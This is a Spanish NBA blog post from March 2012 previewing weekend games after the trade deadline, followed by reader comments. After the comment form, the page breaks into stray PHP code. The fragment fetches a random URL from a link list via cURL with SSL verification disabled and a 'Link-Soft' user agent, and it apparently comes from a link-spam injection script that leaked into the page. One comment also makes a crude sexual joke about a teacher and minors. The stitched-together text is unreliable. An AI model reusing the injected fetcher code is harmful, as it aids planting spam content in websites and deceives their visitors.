Fin de semana: Digiriendo el trade deadline

16 de March de 2012 por txusma

La tarde-noche del jueves ha resultado emocionante. No se habrán movido grandes figuras pero el goteo de informaciones, traspasos y despidos nos ha mantenido enganchados a más de uno. Ahora llega el momento de ver a los jugadores que han cambiado de equipo con sus nuevas camisetas. ¿Cómo le sentará la de los Bucks a Monta Ellis? ¿Y la de los Nets a Gerald Wallace? Y sobre todo ¿se reconocerá Derek Fisher vestido con la camiseta de los Rockets?

VIERNES

Esta misma noche tenemos 11 partidos. Destaco el Bucks-Warriors (3h30) por el morbillo de ver a Monta Ellis y Ekpe Udoh enfrentarse a su ex-equipo. También son interesantes a nivel de competitividad el Heat-Sixers (00h00), el Pacers-Knicks (00h30) y sobre todo, el Thunder-Spurs (2h30), primero y segundo de la conferencia Oeste.

Wolves y Lakers se enfrentan a las 3h30 con la duda de Kevin Love (que siempre se pierde los partidos contra los Lakers) y con la posibilidad de ver ya a Ramon Sessions vestido de dorado y púrpura. Y ojo a la paliza que se pueden llevar los Blazers en su visita a Chicago  (1h00). El equipo de Portland es ahora mismo de los más débiles de la competición con las bajas de Gerald Wallace y Marcus Camby. Y hace unas semanas la mayoría no dábamos un duro por que Dwight Howard fuera a disputar el Nets-Magic (0h00) con la camiseta de los Magic. De hecho, hasta pensábamos que lo podía hacer con la de los Nets. La de vueltas que da la vida.

SÁBADO

El que sí se vestirá con el uniforme de los Nets es Gerald Wallace ante los Hornets (1h00), un rival propicio para ir asimilando conceptos. En Los Angeles otros que se pueden estrenar son Nick Young con la camiseta de los Clippers y Marcus Camby y Derek Fisher con la de los Rockets (20h30, buena hora). Finalmente en Denver es posible que veamos el debut de Javale McGee con la camiseta de los Nuggets. Sería a las 2h00 frente los Celtics.

Aparte de los estrenos nos quedamos con el Sixers-Bulls (1h00) y el back-to-back de Knicks y Pacers (00h00).

DOMINGO

Y para el domingo, 8 partidos más. Los Lakers reciben a unos Jazz (2h30) que no contarán con Al Jefferson, que acudirá el entierro de su abuela. Como cada domingo tenemos partidos en horario diurno. Serán el Hawks-Cavaliers (20h00) y el PistonsClippers (20h30). El resto de partidos son un poco descafeinados a excepción del Magic-Heat (1h00). LeBron, Wade y compañía deben tener ganas de revancha después de la derrota que sufrieron hace apenas 3 días.

Comenta

63 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Yo creo que se retirará

      Citar

  2. HeiNeKeN dice:
    #2

    Jose Luis:
    Yo creo que se irá o a un equipo cerca de Los Ángeles, o a un equipo del este de play-offs, exceptuando a Miami.

    Podría irse a los Clippers jajajajaa, además me han dicho que no tienen bases xD

      Citar

  3. Sancho88 dice:
    #3

    Bueno, me he reenganchado al Sacramento-Minnesota, podría darle algunos consejos a Adelman de como ganar a esta banda, pero supongo que ya lo sabrá todo sobre cómo ganar a un equipo como este. La clave: si aprietas un poco atrás, no meten ni una canasta. Ya veréis a partir del tercer cuarto, si sube un poco la intensidad defensiva los Wolves…

      Citar

  4. Sancho88 dice:
    #4

    Además, me da muchísima pena ver a Cousins al lado de esta banda, está desperdiciando mucho talento, cuando podría estar en un equipo muchísimo mejor…

      Citar

  5. Esteban dice:
    #5

    yo insisto y sigo sorprendido con el nivel de gerald green, creo q es la ganga del mercado en este momento, un tio que jugo los ultimos 11 partidos de su equipo, saltando de la banca, que esta promediando mas de 11 pp, y que sus ultimos 5 juegos anoto, 26, 11, 26, 14 y 16 puntos en cada juego, y que estara libre y disponible para cualquier franquicia en unos dias, no se puede dejar pasar

    casi todos los jugadores libres que quedaran ahora, sera por q vienen jugando mal, green por el contrario bien jugando muy bien, ojala regrese a los lakers, creo que seria una pieza fundamental para suplir a metta

      Citar

  6. melo15 dice:
    #6

    Sancho, das por hecho de que Evans ya no puede ser un all-star?
    Tranqui que para mañana tendras mi articulo y podras ilusionarte con el proximo draft jejeje

      Citar

  7. Sancho88 dice:
    #7

    Música para mis oídos melo, que los Kings están de capa caída desde hace muchos años. Necesitamos un verdadero crack, y que nos toque la bolita número 1, que no sé si alguna vez nos ha caído a nosotros… Ansioso estoy por saber qué artículo vas a publicar. Yo te doy un consejo, imprime el artículo y preséntale a tu profesora de lengua el artículo con los comentarios adjuntos. Si está buena, puede que quiera algo contigo después de clase. Si es así, un consejo. Llévatela a los baños de los profesores y hazle el amor como si fuera la madre de Stifler.

    Pd: Espero que no me demandes por corrupción de menores, jajaaj

      Citar

  8. Esteban dice:
    #8

    boyuot para fisher!!!!!!! q olor q tiene a HEAT esto, es el unico contendiente que necesita un base y puede ofrecerle buena cantidad de minitos a derek, no veo a otro equipo q lo necesite

    otra podria ser el thunder, para que russell juegue de escolta mas minutos, y sobretodo para que fisher cierre los partidos,

    en cualquiera de los dos casos, puede ser de gran ayuda para ir por el titulo

      Citar

  9. MagicJohnson32 dice:
    #9

    Qué mal llegan a jugar los Clippers… Los partidos son iguales, 3 cuartos y medio lamentables hasta que se acerca el final y Chris Paul dice que se acabó el recreo y es hora de los profesionales. Les ganó el partido él solo a los Rockets y se lo ha ganado a los Pistons (aunque ambos tuvieron tiros para ganar y perdonaron).

    ¿Alguien más piensa que Del Negro es muy malo? ¿Nadie?

      Citar

  10. Sancho88 dice:
    #10

    Yo pienso que su sistema defensivo no es tan impenetrable como él piensa, que vive de las rentas de sus dos buenas campañas en los Bulls, y que en ataque el equipo es nulo, inofensivo, excepto rachas de anotación individuales de Chris Paul. El resto da mucha pena, y como equipo, es facilísimo de defender en unas series finales. Griffin no ataca los sistemas como debiera, no saca casi nada de ventaja en la zona, y con un 2 contra 1 básico, es muy fácil de parar. Su lectura del juego es bastante pésima, para ser un all-star, y sus recursos de pase son muy limitados. En un momento caliente, hacerle falta a él puede darte la victoria. Siempre es más efectivo que dejarle tirar a Paul. A Jordan le pasa lo mismo, pero a límites insospechados. No concibo como dos tipos con esa planta física, sean incapaces de atacar una zona en condiciones y poner en apuros a sus rivales. Ya digo, de patio de colegio el sistema ofensivo, y luego decimos de Brown y McMillan… Y sí, a Clippers les meten pocos puntos, pero habrá que ver en Playoffs, con los equipos jugando al 100% y las mecánicas de ataque perfectamente coordinadas. Ya te digo que Del Negro se piensa que es un hacha creando defensas, pues yo digo que hace una semana le cogió por banda el señor Doc Rivers, y con el simplísimo y callejero “cortar y seguir” le hizo un traje. Bases como Rondo o Parker les descubren las vergüenzas fácilmente, y otros como Westbrook, Rose, el propio Jason Terry o Kyle Lowry, por ritmo de juego, son capaces de llevar a sus equipos a anotaciones altas, algo que en Clippers no pasa, no por Paul, sino por la ineficiencia para crear una estrategia colectiva de Del Negro. Mientras los dos de la zona no produzcan como deben, seguirán metiendo pocos puntos. Yo prefiero a Kenyon Martin para jugar junto a Grffin. Al menos tiene mucha experiencia en playoffs y mucho más talento en ataque que Jordan, eso es evidente. En definitiva, Clippers es un equipo que se protege todo el partido en su defensa y en el control del partido, pero ya digo que en playoffs hay bases muy rápidos que no te van a permitir jugar a 80 puntos. Por tanto, o Paul imprime por su cuenta un ritmo de juego más alto, o lo pasarán mal casi contra cualquiera en playoffs, porque todos los que están ahora mismo metidos en el Oeste, juegan cómodos a partidos de +100 puntos. Bueno, quizá Dallas es el equipo que le veo con más dificultades para anotar, pero en un partido perro a defender, Carlisle les tiene adiestrados desde el año pasado. Quizá no tengan a Chandler, pero sigue Marion, y Lamar Odom tiene que dar un paso adelante. Además, ahora mismo el emparejamiento sería contra los Grizzlies, unos tipos que con Randolph sano te pueden llevar un partido a más de 110. Ahí no llegan los Clippers ni de coña, eso es seguro

      Citar

  11. Lucho dice:
    #11

    Primeros 6 minutos del ultimo cuarto, los Magic: 7 perdidas. Si, en ese tramo, en total llevan casi 20

      Citar

  12. nba dice:
    #12

    A alguien le sobran unas cuantas mandarinas , ya que parece que Kobe ha acabado con todo el cargamento que tenía disponible, o quizas no ??

      Citar

  13. Denise dice:
    #13

    Me gustaría que Fisher se fuese a los Heat, para que supere en número de anillos a Kobe..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>